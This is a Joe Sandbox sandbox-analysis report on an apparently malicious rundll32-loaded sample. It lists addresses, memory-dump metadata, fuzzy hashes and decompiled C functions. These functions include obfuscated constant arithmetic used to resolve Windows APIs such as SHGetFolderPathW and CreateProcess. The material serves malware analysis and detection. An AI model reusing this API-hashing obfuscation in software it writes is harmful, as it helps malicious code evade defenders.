                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018643e
                                                                                                                      0x00186442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00186444
                                                                                                                      0x00186447
                                                                                                                      0x00186447
                                                                                                                      0x00186447
                                                                                                                      0x00186455
                                                                                                                      0x00186455
                                                                                                                      0x00186457
                                                                                                                      0x0018645a
                                                                                                                      0x0018645a
                                                                                                                      0x0018645d
                                                                                                                      0x0018645d
                                                                                                                      0x00000000
                                                                                                                      0x0018642f
                                                                                                                      0x001862b2
                                                                                                                      0x00186368
                                                                                                                      0x0018638e
                                                                                                                      0x001863aa
                                                                                                                      0x001863af
                                                                                                                      0x001863b3
                                                                                                                      0x001863bf
                                                                                                                      0x001863fd
                                                                                                                      0x0018640e
                                                                                                                      0x00186415
                                                                                                                      0x0018641a
                                                                                                                      0x0018641d
                                                                                                                      0x00000000
                                                                                                                      0x0018641d
                                                                                                                      0x001862be
                                                                                                                      0x00186342
                                                                                                                      0x00186356
                                                                                                                      0x0018635b
                                                                                                                      0x0018635e
                                                                                                                      0x00000000
                                                                                                                      0x0018635e
                                                                                                                      0x001862c0
                                                                                                                      0x001862c6
                                                                                                                      0x001862cc
                                                                                                                      0x001862d0
                                                                                                                      0x001862df
                                                                                                                      0x00186303
                                                                                                                      0x00186318
                                                                                                                      0x0018631a
                                                                                                                      0x00186324
                                                                                                                      0x0018632a
                                                                                                                      0x0018632f
                                                                                                                      0x0018632f
                                                                                                                      0x0018647f
                                                                                                                      0x00186485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018648b
                                                                                                                      0x00186478
                                                                                                                      0x0018647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: c19c309922fbec09a619c2bb065d1c185a01242fd7cdedea4032de92cc5c5827
                                                                                                                      • Instruction ID: bb8b6e8c6633272347e84aa13738ee698e55ef5e51bb778754263dedce18e5a5
                                                                                                                      • Opcode Fuzzy Hash: c19c309922fbec09a619c2bb065d1c185a01242fd7cdedea4032de92cc5c5827
                                                                                                                      • Instruction Fuzzy Hash: EB0212725083809FD3A8DF65C58A64FBBF1BBC5748F508A1DF19A8A260D7B08949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00179700 Relevance: 1.5, Strings: 1, Instructions: 201COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 179700-1799cc call 17cf25 call 191310 call 18679c 286 1799d1-1799d6 280->286 287 179a15 286->287 288 1799d8-1799da 286->288 291 179a17-179a1d 287->291 289 1799dc-1799e2 288->289 290 1799e8-179a13 call 184dad * 2 288->290 292 1799e3-1799e6 289->292 290->292 292->291
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00179700(WCHAR* __ecx, void* __edx, void* __eflags) {
				void* _t207;
				void* _t231;
				void* _t232;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t243;
				intOrPtr _t265;
				WCHAR* _t268;
				void* _t271;
				void* _t272;

				_t271 = _t272 - 0x58;
				_push( *((intOrPtr*)(_t271 + 0x7c)));
				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
				_t268 = __ecx;
				_push( *((intOrPtr*)(_t271 + 0x78)));
				_push( *((intOrPtr*)(_t271 + 0x74)));
				_push( *((intOrPtr*)(_t271 + 0x70)));
				_push(_t265);
				_push( *((intOrPtr*)(_t271 + 0x68)));
				_push(0);
				_push( *((intOrPtr*)(_t271 + 0x60)));
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t207);
				 *(_t271 + 0x40) = 0x9c1626;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
				 *(_t271 + 0x50) = 0x2d866;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
				 *(_t271 + 0x1c) = 0xb11a6d;
				_t237 = 0x61;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
				 *(_t271 + 0x28) = 0x82663;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
				 *(_t271 + 0xc) = 0xaf113;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
				 *(_t271 + 0x30) = 0x440ee2;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
				_t238 = 0x3a;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
				 *(_t271 + 8) = 0x67057e;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
				 *(_t271 + 0x38) = 0x1c9970;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
				 *(_t271 + 0x54) = 0x9de9b7;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
				 *(_t271 + 0x48) = 0xcb1eea;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
				 *(_t271 + 0x20) = 0xb0d713;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
				 *(_t271 + 0x18) = 0xfc2615;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
				 *(_t271 + 0x4c) = 0x55d93;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
				 *(_t271 + 0x24) = 0xa7d31;
				_t239 = 0x67;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
				_t240 = 0x64;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
				 *(_t271 + 0x14) = 0x947781;
				_t241 = 0x11;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
				 *(_t271 + 0x2c) = 0x75c872;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
				_t242 = 0x74;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
				 *(_t271 + 0x10) = 0x81f543;
				_t149 = _t271 - 0x4c; // 0x10f16291
				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
				 *(_t271 + 0x3c) = 0x7405f8;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
				 *(_t271 + 0x34) = 0x5a2607;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
				 *(_t271 + 0x44) = 0xea1272;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
				_push( *(_t271 + 0x28));
				_push( *(_t271 + 0x1c));
				_push( *(_t271 + 0x50));
				_push( *(_t271 + 0x40));
				_t243 = 0x44;
				E00191310(_t243, _t149);
				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
				_t183 = _t271 - 0x4c; // 0x10f16291
				_t189 = _t271 - 8; // 0x10f162d5
				_t231 = E0018679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
				if(_t231 == 0) {
					_t232 = 0;
				} else {
					if(_t265 == 0) {
						E00184DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
						E00184DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t232 = 1;
				}
				return _t232;
			}

















                                                                                                                      0x00179701
                                                                                                                      0x0017970d
                                                                                                                      0x00179710
                                                                                                                      0x00179713
                                                                                                                      0x00179715
                                                                                                                      0x00179718
                                                                                                                      0x0017971b
                                                                                                                      0x0017971e
                                                                                                                      0x0017971f
                                                                                                                      0x00179722
                                                                                                                      0x00179724
                                                                                                                      0x00179727
                                                                                                                      0x00179728
                                                                                                                      0x00179729
                                                                                                                      0x0017972e
                                                                                                                      0x00179737
                                                                                                                      0x0017973b
                                                                                                                      0x0017973f
                                                                                                                      0x00179746
                                                                                                                      0x0017974d
                                                                                                                      0x00179754
                                                                                                                      0x0017975b
                                                                                                                      0x00179762
                                                                                                                      0x00179766
                                                                                                                      0x0017976d
                                                                                                                      0x0017977a
                                                                                                                      0x0017977d
                                                                                                                      0x00179780
                                                                                                                      0x00179787
                                                                                                                      0x0017978e
                                                                                                                      0x00179799
                                                                                                                      0x001797a3
                                                                                                                      0x001797a6
                                                                                                                      0x001797ad
                                                                                                                      0x001797b4
                                                                                                                      0x001797bb
                                                                                                                      0x001797c2
                                                                                                                      0x001797c9
                                                                                                                      0x001797d1
                                                                                                                      0x001797d2
                                                                                                                      0x001797d5
                                                                                                                      0x001797dc
                                                                                                                      0x001797e3
                                                                                                                      0x001797ea
                                                                                                                      0x001797f1
                                                                                                                      0x001797fc
                                                                                                                      0x001797ff
                                                                                                                      0x00179806
                                                                                                                      0x0017980d
                                                                                                                      0x00179819
                                                                                                                      0x0017981c
                                                                                                                      0x00179823
                                                                                                                      0x0017982a
                                                                                                                      0x00179831
                                                                                                                      0x00179838
                                                                                                                      0x0017983f
                                                                                                                      0x00179846
                                                                                                                      0x0017984d
                                                                                                                      0x00179854
                                                                                                                      0x0017985b
                                                                                                                      0x00179862
                                                                                                                      0x00179866
                                                                                                                      0x0017986d
                                                                                                                      0x00179874
                                                                                                                      0x0017987b
                                                                                                                      0x00179882
                                                                                                                      0x00179889
                                                                                                                      0x00179894
                                                                                                                      0x00179899
                                                                                                                      0x0017989d
                                                                                                                      0x001798a4
                                                                                                                      0x001798b0
                                                                                                                      0x001798b5
                                                                                                                      0x001798be
                                                                                                                      0x001798c1
                                                                                                                      0x001798c4
                                                                                                                      0x001798cb
                                                                                                                      0x001798d7
                                                                                                                      0x001798d8
                                                                                                                      0x001798dd
                                                                                                                      0x001798e4
                                                                                                                      0x001798f2
                                                                                                                      0x001798fb
                                                                                                                      0x001798fc
                                                                                                                      0x001798ff
                                                                                                                      0x00179906
                                                                                                                      0x00179912
                                                                                                                      0x00179915
                                                                                                                      0x00179918
                                                                                                                      0x0017991f
                                                                                                                      0x00179926
                                                                                                                      0x0017992d
                                                                                                                      0x00179934
                                                                                                                      0x0017993b
                                                                                                                      0x00179942
                                                                                                                      0x00179949
                                                                                                                      0x00179950
                                                                                                                      0x00179957
                                                                                                                      0x0017995e
                                                                                                                      0x00179965
                                                                                                                      0x0017996c
                                                                                                                      0x00179973
                                                                                                                      0x0017997a
                                                                                                                      0x00179981
                                                                                                                      0x00179984
                                                                                                                      0x00179987
                                                                                                                      0x0017998a
                                                                                                                      0x0017998f
                                                                                                                      0x00179990
                                                                                                                      0x00179998
                                                                                                                      0x0017999f
                                                                                                                      0x001799b6
                                                                                                                      0x001799cc
                                                                                                                      0x001799d6
                                                                                                                      0x00179a15
                                                                                                                      0x001799d8
                                                                                                                      0x001799da
                                                                                                                      0x001799f7
                                                                                                                      0x00179a0b
                                                                                                                      0x001799dc
                                                                                                                      0x001799df
                                                                                                                      0x001799e0
                                                                                                                      0x001799e1
                                                                                                                      0x001799e2
                                                                                                                      0x001799e2
                                                                                                                      0x001799e5
                                                                                                                      0x001799e5
                                                                                                                      0x00179a1d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID: a+
                                                                                                                      • API String ID: 963392458-552692850
                                                                                                                      • Opcode ID: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction ID: a40b1691a2bec2fa1ec22d56b07cde3d95bfb406bead77f1cd2df4cdf9bdda54
                                                                                                                      • Opcode Fuzzy Hash: ed31a0d6dfb925acc26532d382f0ccb55eac3a6ec82b219ad8ab685718ec66c2
                                                                                                                      • Instruction Fuzzy Hash: 38A1EF72500248EBDF59CF64C94A9CE3BA2FF48358F119219FE199A260D3B6D995CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(006E78E8), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(006E78E8), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017EA7B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 17ea7b-17eb35 call 17cf25 call 172d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0017EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t41;
				intOrPtr* _t50;
				void* _t51;
				signed int _t52;
				signed int _t53;
				void* _t60;

				_t60 = __edx;
				E0017CF25(_t41);
				_v16 = 0xd33285;
				_v16 = _v16 + 0xd9cb;
				_v16 = _v16 | 0xd94823ae;
				_v16 = _v16 ^ 0xd9d95ea2;
				_v8 = 0xf9f040;
				_v8 = _v8 ^ 0x026675a4;
				_t52 = 0x46;
				_v8 = _v8 / _t52;
				_t53 = 0x2b;
				_v8 = _v8 / _t53;
				_v8 = _v8 ^ 0x000f054e;
				_v12 = 0x255c2b;
				_v12 = _v12 ^ 0x0b9b7933;
				_v12 = _v12 + 0xffff1ebc;
				_v12 = _v12 ^ 0x0bb758ac;
				_t50 = E00172D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
				return _t51;
			}












                                                                                                                      0x0017ea85
                                                                                                                      0x0017ea9a
                                                                                                                      0x0017ea9f
                                                                                                                      0x0017eaa9
                                                                                                                      0x0017eab2
                                                                                                                      0x0017eab9
                                                                                                                      0x0017eac0
                                                                                                                      0x0017eac7
                                                                                                                      0x0017ead3
                                                                                                                      0x0017ead8
                                                                                                                      0x0017eae0
                                                                                                                      0x0017eae8
                                                                                                                      0x0017eaeb
                                                                                                                      0x0017eaf2
                                                                                                                      0x0017eaf9
                                                                                                                      0x0017eb00
                                                                                                                      0x0017eb07
                                                                                                                      0x0017eb1f
                                                                                                                      0x0017eb2e
                                                                                                                      0x0017eb35

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0017EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: c860c04aadc6453d88f4ce89c49faf9fe2572f6d2fc77da99d7c8208b8fd423f
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: A7119732D00208BBDB14DEE6C94A8DFBFB6EB85310F10C099F508A6210E7714B61AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
